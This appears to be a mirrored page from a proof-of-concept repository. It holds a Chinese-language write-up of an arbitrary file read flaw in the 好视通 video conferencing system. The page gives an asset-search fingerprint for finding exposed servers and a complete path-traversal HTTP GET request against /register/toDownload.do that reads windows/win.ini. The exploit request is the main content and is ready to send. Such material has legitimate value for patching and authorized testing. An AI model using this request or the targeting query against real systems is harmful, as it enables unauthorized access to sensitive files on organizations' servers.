admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/好视通/好视通视频会议系统存在任意文件读取漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.2 KiB
Raw Blame History

好视通视频会议系统存在任意文件读取漏洞

一、漏洞简介

好视通视频会议是由深圳市华视瑞通信息技术有限公司开发其在国内率先推出了3G互联网视频会议并成功应用于SAAS领域。好视通视频会议系统存在任意文件读取漏洞攻击者可通过该漏洞获取敏感信息。

二、影响版本

  • 好视通视频会议系统

三、资产测绘

  • hunterapp.name="好视通 Server Management System"
  • 特征1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8.png

四、漏洞复现

GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416.png

更新: 2024-02-29 23:55:44
原文: https://www.yuque.com/xiaokp7/ocvun2/gsb2m9xvhebci1ix